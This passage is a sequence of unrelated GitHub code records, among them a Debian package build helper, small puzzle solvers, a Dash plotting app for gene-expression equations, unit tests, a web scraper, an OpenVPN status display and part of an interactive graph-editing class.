chroot)\n else:\n buildable.copy_source_to(worker)\n\n def sbuild(\n self,\n worker, # type: VirtWorker\n *,\n archs=(), # type: Iterable[str]\n build_source=None, # type: Optional[bool] # None -> auto\n indep=False,\n indep_together=False,\n source_only=False,\n source_together=False,\n ):\n with worker:\n self._sbuild(worker)\n\n def _sbuild(\n self,\n worker, # type: VirtWorker\n *,\n archs=(), # type: Iterable[str]\n build_source=None, # type: Optional[bool] # None -> auto\n indep=False,\n indep_together=False,\n source_only=False,\n source_together=False,\n ):\n\n logger.info('Installing sbuild')\n worker.check_call([\n 'env',\n 'DEBIAN_FRONTEND=noninteractive',\n 'apt-get',\n '-y',\n '-t', worker.suite.apt_suite,\n '--no-install-recommends',\n 'install',\n\n 'python3',\n 'sbuild',\n 'schroot',\n ])\n # Be like the real Debian build infrastructure: give sbuild a\n # nonexistent home directory.\n worker.check_call([\n 'usermod',\n '-d', '/nonexistent',\n 'sbuild',\n ])\n\n for buildable in self.buildables:\n logger.info('Processing: %s', buildable)\n self.get_source(buildable, worker)\n buildable.select_archs(\n worker_arch=worker.dpkg_architecture,\n archs=archs,\n indep=indep,\n indep_together=indep_together,\n build_source=build_source,\n 
source_only=source_only,\n source_together=source_together,\n )\n\n logger.info('Builds required: %r', list(buildable.archs))\n\n for arch in buildable.archs:\n self.new_build(buildable, arch, worker).sbuild(\n sbuild_options=self.sbuild_options)\n\n buildable.merge_changes()\n\n def pbuilder(\n self,\n worker, # type: VirtWorker\n *,\n archs=(), # type: Iterable[str]\n indep=False,\n indep_together=False,\n ):\n with worker:\n self._pbuilder(worker)\n\n def _pbuilder(\n self,\n worker, # type: VirtWorker\n *,\n archs=(), # type: Iterable[str]\n indep=False,\n indep_together=True,\n ):\n for buildable in self.buildables:\n if buildable.source_from_archive:\n raise ArgumentError(\n 'pbuilder can only build a .dsc file')\n\n logger.info('Installing pbuilder')\n worker.check_call([\n 'env',\n 'DEBIAN_FRONTEND=noninteractive',\n 'apt-get',\n '-y',\n '-t', worker.suite.apt_suite,\n '--no-install-recommends',\n 'install',\n\n 'eatmydata',\n 'fakeroot',\n 'net-tools',\n 'pbuilder',\n 'python3',\n ])\n\n for buildable in self.buildables:\n logger.info('Processing: %s', buildable)\n self.get_source(buildable, worker)\n buildable.select_archs(\n worker_arch=worker.dpkg_architecture,\n archs=archs,\n indep=indep,\n indep_together=indep_together,\n build_source=False,\n source_only=False,\n source_together=True,\n )\n\n logger.info('Builds required: %r', list(buildable.archs))\n\n for arch in buildable.archs:\n self.new_build(buildable, arch, worker).pbuilder()\n\n buildable.merge_changes()\n\n def autopkgtest(\n self,\n *,\n default_architecture, # type: str\n lxc_24bit_subnet, # type: str\n lxc_worker, # type: List[str]\n lxd_worker, # type: List[str]\n modes=(), # type: Iterable[str]\n qemu_ram_size, # type: int\n schroot_worker, # type: List[str]\n worker, # type: List[str]\n ):\n for buildable in self.buildables:\n try:\n source_dsc = None\n source_package = None\n\n if buildable.dsc_name is not None:\n source_dsc = buildable.dsc_name\n logger.info('Testing source changes file %s', source_dsc)\n elif buildable.source_from_archive:\n source_package = buildable.source_package\n logger.info('Testing source package %s', source_package)\n else:\n logger.warning(\n 'Unable to run autopkgtest on %s', buildable.buildable)\n continue\n\n if (buildable.dsc is not None and\n 'testsuite' not in buildable.dsc):\n logger.info('No autopkgtests available')\n continue\n\n test_architectures = []\n\n for arch in buildable.archs:\n if arch != 'all' and arch != 'source':\n test_architectures.append(arch)\n\n if 'all' in buildable.archs and not test_architectures:\n test_architectures.append(default_architecture)\n\n logger.info('Testing on architectures: %r', test_architectures)\n\n for architecture in test_architectures:\n buildable.autopkgtest_failures.extend(\n run_autopkgtest(\n architecture=architecture,\n binaries=buildable.get_debs(architecture),\n components=self.components,\n extra_repositories=self.extra_repositories,\n lxc_24bit_subnet=lxc_24bit_subnet,\n lxc_worker=lxc_worker,\n lxd_worker=lxd_worker,\n mirrors=self.mirrors,\n modes=modes,\n output_logs=buildable.output_dir,\n qemu_ram_size=qemu_ram_size,\n schroot_worker=schroot_worker,\n source_dsc=source_dsc,\n source_package=source_package,\n storage=self.storage,\n suite=buildable.suite,\n vendor=self.vendor,\n worker=worker,\n ),\n )\n except KeyboardInterrupt:\n buildable.autopkgtest_failures.append('interrupted')\n raise\n\n def piuparts(\n self,\n *,\n default_architecture, # type: str\n tarballs, # type: Iterable[str]\n worker, # type: 
VirtWorker\n ):\n for buildable in self.buildables:\n try:\n test_architectures = []\n\n for arch in buildable.archs:\n if arch != 'all' and arch != 'source':\n test_architectures.append(arch)\n\n if 'all' in buildable.archs and not test_architectures:\n test_architectures.append(default_architecture)\n\n logger.info(\n 'Running piuparts on architectures: %r',\n test_architectures)\n\n for architecture in test_architectures:\n buildable.piuparts_failures.extend(\n run_piuparts(\n architecture=architecture,\n binaries=(\n Binary(b, deb=b)\n for b in buildable.get_debs(architecture)),\n components=self.components,\n extra_repositories=self.extra_repositories,\n mirrors=self.mirrors,\n output_logs=buildable.output_dir,\n storage=self.storage,\n suite=buildable.suite,\n tarballs=tarballs,\n vendor=self.vendor,\n worker=worker,\n ),\n )\n except KeyboardInterrupt:\n buildable.piuparts_failures.append('interrupted')\n raise\n","repo_name":"smcv/vectis","sub_path":"vectis/debuild.py","file_name":"debuild.py","file_ext":"py","file_size_in_byte":60501,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21553419149","text":"'''\nCreated on 24. tra 2017.\n\n@author: Annie\n'''\n\nimport copy\n\nfrom sudoku_solver import SudokuSolver\n\nclass SudokuTree(object):\n\n def __init__(self, tile, digit, sudoku_board, children=None):\n self.solver = SudokuSolver()\n self.solver.sudoku_board = copy.deepcopy(sudoku_board)\n self.tile = tile\n self.digit = digit\n self.children = []\n if children is not None:\n for child in children:\n self.add_child(child)\n\n def add_child(self, node):\n assert isinstance(node, SudokuTree)\n self.children.append(node)\n\n","repo_name":"anniekovac/sudoku_solver","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4511298063","text":"with open(\"input\") as f:\n row = f.read().strip()\n\n\ndef grow(row):\n new_row = ''\n for i in range(len(row)):\n if i == 0:\n pos = '.' 
+ row[:2]\n elif i == len(row) - 1:\n pos = row[-2:] + '.'\n else:\n pos = row[i - 1: i + 2]\n if pos in {'^^.', '.^^', '^..', '..^'}:\n new_row += '^'\n else:\n new_row += '.'\n return new_row\n\n\ndef solve(row, n_rows):\n count = row.count('.')\n for _ in range(n_rows):\n row = grow(row)\n count += row.count('.')\n return count\n\n# part I\nprint(solve(row, 39))\n\n# part II\nprint(solve(row, 399999))\n","repo_name":"madsthoisen/advent_of_code","sub_path":"2016/dec18/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73535251689","text":"# -*- coding: utf-8 -*-\n\"\"\"## Imports\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.integrate import solve_ivp\n\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport dash\nfrom dash import dcc, html\nfrom dash.dependencies import Input, Output\n\n\"\"\"## Model definitions\"\"\"\n\ndef gene_expression_eq1(t, x, params):\n '''\n t - time span\n x - differentiated variable\n params - set of specific parameters for this equation!\n returns: x(t)\n '''\n\n try:\n phi, s, delta, n, m, A, E, S, E_trh, S_trh = params\n except ValueError as ve:\n print(ve, 'Check that your parameters satisfy Model 1 parameters!')\n\n enhancer_term = np.power(E, n) / (np.power(E, n) + np.power(E_trh, n))\n silencer_term = np.power(S_trh, m) / (np.power(S, m) + np.power(E_trh, m))\n x_t = phi * s * A * enhancer_term * silencer_term - x*delta\n\n return x_t\n\n\ndef gene_expression_eq2(t, x, params):\n '''\n t - time span\n x - differentiated variable\n params - set of specific parameters for this equation!\n returns: x(t)\n '''\n\n try:\n phi, s, delta, A, E, S, Ek1, Ek2, Sk1, Sk2 = params\n except ValueError as ve:\n print(ve, 'Check that your parameters satisfy Model 1 parameters!')\n\n\n x_t = phi * s * A * ((E/Ek1 + 1)*(A + Ek2))/((A + Sk2)*(1+S/Sk1)) - x*delta\n\n return x_t\n\ndef solve_eq(eq, x0, params, t_span = (0, 10), nsteps=10):\n '''\n eq - function for DE\n x0 - initial values (np.array)\n params - set of specific parameters for this equation (list)\n returns: y = dx/dt\n '''\n # solving the equation numerically\n solution = solve_ivp(\n eq,\n t_span = t_span,\n y0 = x0,\n args = [params],\n t_eval = np.linspace(t_span[0], t_span[1], nsteps)\n )\n return solution\n\n\"\"\"## Dash app - plotting two equations\"\"\"\n\napp = dash.Dash(__name__)\n\napp.layout = html.Div(children=[\n html.Div([\n dcc.Graph(id='ode-graph'),\n ]) ,\n\n # base parameters\n html.Div([\n html.H4('Common parameters:'),\n html.H6('Phi'),\n dcc.Slider(id='slider-phi', min=0.0, max=5.0, step=1.0, value=1.0),\n html.H6('s'),\n dcc.Slider(id='slider-s', min=0.0, max=5.0, step=1.0, value=1.0),\n html.H6('delta'),\n dcc.Slider(id='slider-delta', min=0.0, max=5.0, step=1.0, value=1.0),\n html.H6('A'),\n dcc.Slider(id='slider-A', min=0.0, max=2.0, step=0.5, value=1.0),\n html.H6('E'),\n dcc.Slider(id='slider-E', min=0.0, max=2.0, step=0.5, value=1.0),\n html.H6('S'),\n dcc.Slider(id='slider-S', min=0.0, max=2.0, step=0.5, value=1.0),\n\n html.H4('Parameters for equation 2:'),\n html.H6('Ke1'),\n dcc.Slider(id='slider-Ke1', min=0.1, max=3.6, step=0.5, value=1.0),\n html.H6('Ke2'),\n dcc.Slider(id='slider-Ke2', min=0.1, max=3.6, step=0.5, value=1.0),\n html.H6('Ks1'),\n dcc.Slider(id='slider-Ks1', min=0.1, max=3.6, step=0.5, value=1.0),\n html.H6('Ks2'),\n dcc.Slider(id='slider-Ks2', min=0.1, max=3.6, step=0.5, value=1.0),\n\n 
html.H4('Parameters for equation 1:'),\n html.H6('n'),\n dcc.Slider(id='slider-n', min=0, max=8, step=2, value=2),\n html.H6('m'),\n dcc.Slider(id='slider-m', min=0, max=8, step=2, value=2),\n html.H6('E_trh'),\n dcc.Slider(id='slider-E_trh', min=0.1, max=3.6, step=0.5, value=1.0),\n html.H6('S_trh'),\n dcc.Slider(id='slider-S_trh', min=0.1, max=3.6, step=0.5, value=1.0),\n ])\n])\n\n\n@app.callback(\n Output('ode-graph', 'figure'),\n [\n Input('slider-phi', 'value'),\n Input('slider-s', 'value'),\n Input('slider-delta', 'value'),\n Input('slider-A', 'value'),\n Input('slider-E', 'value'),\n Input('slider-S', 'value'),\n\n Input('slider-Ke1', 'value'),\n Input('slider-Ke2', 'value'),\n Input('slider-Ks1', 'value'),\n Input('slider-Ks2', 'value'),\n\n Input('slider-n', 'value'),\n Input('slider-m', 'value'),\n Input('slider-E_trh', 'value'),\n Input('slider-S_trh', 'value')\n ]\n)\ndef update_graph(phi, s, delta, A, E, S,\n Ek1, Ek2, Sk1, Sk2,\n n, m, E_trh, S_trh):\n x0 = np.array([10])\n\n params1 = [phi, s, delta, n, m, A, E, S, E_trh, S_trh]\n params2 = [phi, s, delta, A, E, S, Ek1, Ek2, Sk1, Sk2]\n\n sol1 = solve_eq(gene_expression_eq1, x0, params1)\n sol2 = solve_eq(gene_expression_eq2, x0, params2)\n\n sol_df = pd.DataFrame({'solution, dx/td': sol1.y.tolist()[0] + sol2.y.tolist()[0],\n 'time, units': sol1.t.tolist() + sol2.t.tolist(),\n 'equation': [1]*len(sol1.t) + [2]*len(sol2.t)})\n\n #fig = go.Figure()\n #fig.add_trace(go.Scatter(x=selected_df['sol'], y=selected_df['time'], mode='lines', ))\n #fig.update_layout(title='ODE Solution', xaxis_title='Time', yaxis_title='Solution')\n fig = px.line(\n sol_df, x=\"time, units\", y=\"solution, dx/td\", color='equation')\n\n return fig\n\nif __name__ == '__main__':\n app.run(debug=True) # by default host='127.0.0.1', port='8050'\n","repo_name":"checheanya/expression_modelling","sub_path":"part1/lineplots_2equations.py","file_name":"lineplots_2equations.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9987150933","text":"# -*- coding: utf-8 -*-\n#! \\file ./tests/test_support/test_cmd/test_errors.py\n#! \\author Jiří Kučera, \n#! \\stamp 2016-04-06 20:37:59 (UTC+01:00, DST+01:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nCommand processor's error module tests.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nimport unittest\n\nfrom doit.support.errors import DoItError\n\nfrom doit.support.cmd.errors import \\\n ERROR_COMMAND_PROCESSOR, \\\n ERROR_COMMAND, \\\n CommandProcessorError, \\\n CommandError\n\nclass AuxExceptionClass(object):\n __slots__ = [ 'name' ]\n\n def __init__(self, name):\n self.name = name\n #-def\n\n def __str__(self):\n return self.name\n #-def\n#-class\n\nclass AuxTraceback(list):\n __slots__ = []\n\n def __init__(self, content):\n list.__init__(self, content)\n #-def\n\n def __str__(self):\n return \".\".join(self)\n #-def\n#-class\n\nclass TestCommandProcessorErrorCase(unittest.TestCase):\n\n def test_CommandProcessorError(self):\n error_code = ERROR_COMMAND_PROCESSOR\n error_message = \"Dummy error message\"\n traceback = AuxTraceback([\"f1\", \"f2\", \"g3\"])\n none_traceback = None\n\n with self.assertRaises(CommandProcessorError) as eh:\n raise CommandProcessorError(traceback, error_message)\n\n self.assertEqual(\n str(eh.exception),\n \"f1.f2.g3 %s\" % (\n DoItError.ERRMSGFMT % (\n CommandProcessorError.__name__,\n error_code,\n error_message\n )\n )\n )\n\n with self.assertRaises(CommandProcessorError) as eh:\n raise CommandProcessorError(none_traceback, error_message)\n\n self.assertEqual(\n str(eh.exception),\n DoItError.ERRMSGFMT % (\n CommandProcessorError.__name__,\n error_code,\n error_message\n )\n )\n #-def\n#-class\n\nclass TestCommandErrorCase(unittest.TestCase):\n\n def test_CommandError(self):\n eclsname = \"SomeError\"\n detail = \"Some error detail\"\n tb = ()\n\n with self.assertRaises(CommandError) as eh:\n raise CommandError(AuxExceptionClass(eclsname), detail, tb)\n\n self.assertEqual(\n str(eh.exception),\n DoItError.ERRMSGFMT % (\n CommandError.__name__, ERROR_COMMAND,\n \"%s: %s\" % (eclsname, detail)\n )\n )\n self.assertEqual(\n repr(eh.exception), \"%s(\\\"%s\\\")\" % (eclsname, detail)\n )\n self.assertIs(eh.exception.tb, tb)\n #-def\n#-class\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestCommandProcessorErrorCase))\n suite.addTest(unittest.makeSuite(TestCommandErrorCase))\n return suite\n#-def\n","repo_name":"i386x/doit","sub_path":"tests/test_support/test_cmd/test_errors.py","file_name":"test_errors.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1365195151","text":"\"\"\"\nScript to remove duplicates in the database\n\"\"\"\nimport sys\n\nsys.path.insert(1, './api')\nfrom hype_meter import get_collection # noqa # pylint:disable=import-error, wrong-import-position\n\ncollection = get_collection()\n\nfor document in collection.find():\n collection_name = document['name']\n query = {'name': collection_name}\n while len(list(collection.find(query))) != 1:\n print(\"Deleting \" + collection_name)\n collection.delete_one(query)\n","repo_name":"alexrichardson1/nft-toolkit","sub_path":"ml/update_scripts/remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"1678114738","text":"#!/usr/bin/python3\n\"\"\"N Queens problem\"\"\"\nimport sys\n\n\ndef isSafe(board, row, col, n):\n 
\"\"\"Check if a queen can be placed on board\"\"\"\n for i in range(col):\n if board[row][i] == 1:\n return False\n for i, j in zip(range(row, -1, -1), range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n for i, j in zip(range(row, n, 1), range(col, -1, -1)):\n if board[i][j] == 1:\n return False\n return True\n\n\ndef solveNQUtil(board, col, n):\n \"\"\"Solve the n queen problem\"\"\"\n if col == n:\n solution = []\n for i in range(n):\n for j in range(n):\n if board[i][j] == 1:\n solution.append([i, j])\n print(solution)\n return True\n res = False\n for i in range(n):\n if isSafe(board, i, col, n):\n board[i][col] = 1\n res = solveNQUtil(board, col + 1, n) or res\n board[i][col] = 0\n return res\n\n\ndef solveNQ(n):\n \"\"\"Solve the N Queen problem\"\"\"\n board = [[0 for j in range(n)] for i in range(n)]\n if not solveNQUtil(board, 0, n):\n return False\n return True\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(\"Usage: nqueens N\")\n sys.exit(1)\n try:\n n = int(sys.argv[1])\n except ValueError:\n print(\"N must be a number\")\n sys.exit(1)\n if n < 4:\n print(\"N must be at least 4\")\n sys.exit(1)\n solveNQ(n)\n","repo_name":"Felixdiamond/alx-interview","sub_path":"0x05-nqueens/0-nqueens.py","file_name":"0-nqueens.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35216165911","text":"def jc(arg):\n tt = 1\n for i in range(1, arg+1):\n tt *= i\n return tt\n\ndef Sum(arg):\n sum = 0\n for i in range(1, arg+1):\n sum += jc(i)\n return sum\n\n\na = input('请输入数字:')\ntry:\n b = eval(a)\nexcept NameError:\n print('输入有误,请输入正整数')\nelse:\n if type(b) == int:\n obj = Sum(b)\n print(obj)\n else:\n print('输入有误,请输入正整数')","repo_name":"xcyi2017/exercise","sub_path":"abcd.py","file_name":"abcd.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27709836648","text":"#! 
/usr/bin/python\n\nimport time, sys\nimport scrollphat\nfrom datetime import datetime\n\nwhile True:\n\n vpnlog = open('/var/log/openvpn-status.log')\n\n x = 0\n msg = \"\"\n\n for line in vpnlog:\n x += 1\n if x < 4:\n continue\n\n if \"ROUTING TABLE\" in line:\n break\n else:\n userlist = (line.split(\",\"))\n name = userlist[0]\n connect_time = userlist[4].replace(\"\\n\", \"\")\n connect_time = datetime.strptime(connect_time, '%c')\n time_now = datetime.now()\n connected = time_now - connect_time\n connected = str(connected).split('.', 2)[0]\n msg += (name.upper() + \" SESSION TIME: \" + connected + \" \")\n\n vpnlog.close()\n\n scrollphat.set_brightness(25)\n scrollphat.write_string(msg, 11)\n length = scrollphat.buffer_len()\n\n for i in range(length): # for one-offs\n try:\n scrollphat.scroll(1)\n time.sleep(0.06)\n msg = \" \"\n except KeyboardInterrupt:\n scrollphat.clear()\n sys.exit(-1)\n\n # clear the phat buffer and sleep for 30 seconds\n scrollphat.clear()\n time.sleep(30)\n \n","repo_name":"t3amj3ff/activevpn","sub_path":"activevpn.py","file_name":"activevpn.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2901031821","text":"import requests\nimport parsel\n\n\nbase = 'http://books.toscrape.com/catalogue'\nresponse = requests.get(base + '/the-grand-design_405/index.html')\n# response = requests.get(site)\n# print(response.text)\nselector = parsel.Selector(response.text)\n\ntitle = selector.css('h1::text').get() # getting the title\n\n# print(title)\n\nprice = selector.css(\".product_main > .price_color::text\").re_first(r\"\\d*\\.\\d{2}\") # getting the price\n\ndescription = selector.css(\"#product_description ~ p::text\").get() # description\nsuffix = \"...more\"\nif description.endswith(suffix):\n description = description[:-len(suffix)]\n\ncover = base + selector.css(\"#product_gallery img::attr(src)\").get()\n\nprint(title, price, description, cover, sep=\",\")\n","repo_name":"cecilia-martins/trybe-exercicios","sub_path":"ciencia-da-computacao/redes-e-raspagem-de-dados/ex004.py","file_name":"ex004.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24783783705","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nInteractiveGraph variants.\n\"\"\"\n\nimport itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom functools import partial\nfrom matplotlib.patches import Rectangle\nfrom matplotlib.backend_bases import key_press_handler\n\ntry:\n from ._main import InteractiveGraph, BASE_SCALE, DraggableGraph\n from ._line_supercover import line_supercover\n from ._artists import NodeArtist, EdgeArtist\n from ._parser import is_order_zero, is_empty, parse_graph\nexcept ValueError:\n from _main import InteractiveGraph, BASE_SCALE\n from _line_supercover import line_supercover\n from _parser import is_order_zero, is_empty, parse_graph\n\n\nclass NascentEdge(plt.Line2D):\n def __init__(self, source, origin):\n self.source = source\n self.origin = origin\n x0, y0 = origin\n super().__init__([x0, x0], [y0, y0], color='lightgray', linestyle='--')\n\n def _update(self, x1, y1):\n x0, y0 = self.origin\n super().set_data([[x0, x1], [y0, y1]])\n\n\nclass MutableGraph(InteractiveGraph):\n \"\"\"Extends `InteractiveGraph` to support the addition or removal of nodes and edges.\n\n - Double clicking on two nodes successively will create an edge between 
them.\n - Pressing 'insert' or '+' will add a new node to the graph.\n - Pressing 'delete' or '-' will remove selected nodes and edges.\n - Pressing '@' will reverse the direction of selected edges.\n\n Notes\n -----\n When adding a new node, the properties of the last selected node will be used to style the node artist.\n Ditto for edges. If no node or edge has been previously selected the first created node or edge artist will be used.\n\n See also\n --------\n InteractiveGraph\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n\n if is_order_zero(args[0]):\n # The graph is order-zero, i.e. it has no edges and no nodes.\n # We hence initialise with a single edge, which populates\n # - last_selected_node_properties\n # - last_selected_edge_properties\n # with the chosen parameters.\n # We then delete the edge and the two nodes and return the empty canvas.\n super().__init__([(0, 1)], *args[1:], **kwargs)\n self._initialize_data_structures()\n self._delete_edge((0, 1))\n self._delete_node(0)\n self._delete_node(1)\n\n elif is_empty(args[0]):\n # The graph is empty, i.e. it has at least one node but no edges.\n nodes, _, _ = parse_graph(args[0])\n if len(nodes) > 1:\n edge = (nodes[0], nodes[1])\n super().__init__([edge], nodes=nodes, *args[1:], **kwargs)\n self._initialize_data_structures()\n self._delete_edge(edge)\n else: # single node\n node = nodes[0]\n dummy = 0 if node != 0 else 1\n edge = (node, dummy)\n super().__init__([edge], *args[1:], **kwargs)\n self._initialize_data_structures()\n self._delete_edge(edge)\n self._delete_node(dummy)\n else:\n super().__init__(*args, **kwargs)\n self._initialize_data_structures()\n\n # Ignore data limits and return full canvas.\n xmin, ymin = self.origin\n dx, dy = self.scale\n self.ax.axis([xmin, xmin+dx, ymin, ymin+dy])\n\n self.fig.canvas.mpl_connect('key_press_event', self._on_key_press)\n\n\n def _initialize_data_structures(self):\n self._reverse_node_artists = {artist : node for node, artist in self.node_artists.items()}\n self._reverse_edge_artists = {artist : edge for edge, artist in self.edge_artists.items()}\n self._last_selected_node_properties = self._extract_node_properties(next(iter(self.node_artists.values())))\n self._last_selected_edge_properties = self._extract_edge_properties(next(iter(self.edge_artists.values())))\n self._nascent_edge = None\n\n\n def _on_key_press(self, event):\n if event.key in ('insert', '+'):\n self._add_node(event)\n elif event.key in ('delete', '-'):\n self._delete_nodes()\n self._delete_edges()\n elif event.key == '@':\n self._reverse_edges()\n else:\n pass\n\n self.fig.canvas.draw_idle()\n\n\n def _on_press(self, event):\n # TODO : trigger this code on any node or edge selection;\n # clicking on a node or edge is just one of the ways to select them\n super()._on_press(event)\n\n if event.inaxes == self.ax:\n for artist in self._clickable_artists:\n if artist.contains(event)[0]:\n self._extract_artist_properties(artist)\n break\n\n if event.dblclick:\n self._add_or_remove_nascent_edge(event)\n\n\n def _add_or_remove_nascent_edge(self, event):\n for node, artist in self.node_artists.items():\n if artist.contains(event)[0]:\n if self._nascent_edge:\n # connect edge to target node\n if (self._nascent_edge.source, node) not in self.edges:\n self._add_edge((self._nascent_edge.source, node))\n self._update_edges([(self._nascent_edge.source, node)])\n else:\n print(\"Edge already exists!\")\n self._remove_nascent_edge()\n else:\n self._nascent_edge = self._add_nascent_edge(node)\n break\n else:\n if 
self._nascent_edge:\n self._remove_nascent_edge()\n\n\n def _add_nascent_edge(self, node):\n nascent_edge = NascentEdge(node, self.node_positions[node])\n self.ax.add_artist(nascent_edge)\n return nascent_edge\n\n\n def _remove_nascent_edge(self):\n self._nascent_edge.remove()\n self._nascent_edge = None\n\n\n def _extract_artist_properties(self, artist):\n if isinstance(artist, NodeArtist):\n self._last_selected_node_properties = self._extract_node_properties(artist)\n elif isinstance(artist, EdgeArtist):\n self._last_selected_edge_properties = self._extract_edge_properties(artist)\n\n\n def _extract_node_properties(self, node_artist):\n return dict(\n shape = node_artist.shape,\n radius = node_artist.radius,\n facecolor = node_artist.get_facecolor(),\n edgecolor = self._base_edgecolor[node_artist],\n linewidth = self._base_linewidth[node_artist],\n alpha = self._base_alpha[node_artist],\n zorder = node_artist.get_zorder()\n )\n\n\n def _extract_edge_properties(self, edge_artist):\n return dict(\n width = edge_artist.width,\n facecolor = edge_artist.get_facecolor(),\n alpha = self._base_alpha[edge_artist],\n head_length = edge_artist.head_length,\n head_width = edge_artist.head_width,\n edgecolor = self._base_edgecolor[edge_artist],\n linewidth = self._base_linewidth[edge_artist],\n offset = edge_artist.offset, # TODO: need to get node_size of target node instead\n curved = edge_artist.curved,\n zorder = edge_artist.get_zorder(),\n )\n\n\n def _on_motion(self, event):\n super()._on_motion(event)\n\n if event.inaxes == self.ax:\n if self._nascent_edge:\n self._nascent_edge._update(event.xdata, event.ydata)\n self.fig.canvas.draw_idle()\n\n\n def _add_node(self, event):\n if event.inaxes != self.ax:\n print('Position outside of axis limits! Cannot create node.')\n return\n\n # create node ID; use smallest unused int\n node = 0\n while node in self.node_positions.keys():\n node += 1\n\n # get position of cursor place node at cursor position\n pos = self._set_position_of_newly_created_node(event.xdata, event.ydata)\n\n # copy attributes of last selected artist;\n # if none is selected, use a random artist\n if self._selected_artists:\n node_properties = self._extract_node_properties(self._selected_artists[-1])\n else:\n node_properties = self._last_selected_node_properties\n\n artist = NodeArtist(xy = pos, **node_properties)\n\n self._reverse_node_artists[artist] = node\n\n # Update data structures in parent classes:\n # 1) InteractiveGraph\n # 2a) DraggableGraph\n self._draggable_artist_to_node[artist] = node\n # 2b) EmphasizeOnHoverGraph\n self.artist_to_key[artist] = node\n # 2c) AnnotateOnClickGraph\n # None\n # 3a) Graph\n # None\n # 3b) ClickableArtists, SelectableArtists, DraggableArtists\n self._clickable_artists.append(artist)\n self._selectable_artists.append(artist)\n self._draggable_artists.append(artist)\n self._base_linewidth[artist] = artist._lw_data\n self._base_edgecolor[artist] = artist.get_edgecolor()\n # 3c) EmphasizeOnHover\n self.emphasizeable_artists.append(artist)\n self._base_alpha[artist] = artist.get_alpha()\n # 3d) AnnotateOnClick\n # None\n # 4) BaseGraph\n self.nodes.append(node)\n self.node_positions[node] = pos\n self.node_artists[node] = artist\n self.ax.add_patch(artist)\n # self.node_label_artists # TODO (potentially)\n # self.node_label_offset # TODO (potentially)\n\n\n def _set_position_of_newly_created_node(self, x, y):\n return (x, y)\n\n\n def _delete_nodes(self):\n # translate selected artists into nodes\n nodes = [self._reverse_node_artists[artist] 
for artist in self._selected_artists if isinstance(artist, NodeArtist)]\n\n # delete edges to and from selected nodes\n edges = [(source, target) for (source, target) in self.edges if ((source in nodes) or (target in nodes))]\n for edge in edges:\n self._delete_edge(edge)\n\n # delete nodes\n for node in nodes:\n self._delete_node(node)\n\n\n def _delete_node(self, node):\n # print(f\"Deleting node {node}.\")\n artist = self.node_artists[node]\n\n del self._reverse_node_artists[artist]\n\n # Update data structures in parent classes:\n # 1) InteractiveGraph\n # None\n # 2a) DraggableGraph\n del self._draggable_artist_to_node[artist]\n # 2b) EmphasizeOnHoverGraph\n del self.artist_to_key[artist]\n # None\n # 2c) AnnotateOnClickGraph\n if artist in self.annotated_artists:\n self._remove_annotation(artist)\n # 3a) Graph\n # None\n # 3b) ClickableArtists, SelectableArtists, DraggableArtists\n self._clickable_artists.remove(artist)\n self._selectable_artists.remove(artist)\n self._draggable_artists.remove(artist)\n if artist in self._selected_artists:\n self._selected_artists.remove(artist)\n del self._base_linewidth[artist]\n del self._base_edgecolor[artist]\n # 3c) EmphasizeOnHover\n self.emphasizeable_artists.remove(artist)\n del self._base_alpha[artist]\n # 3d) 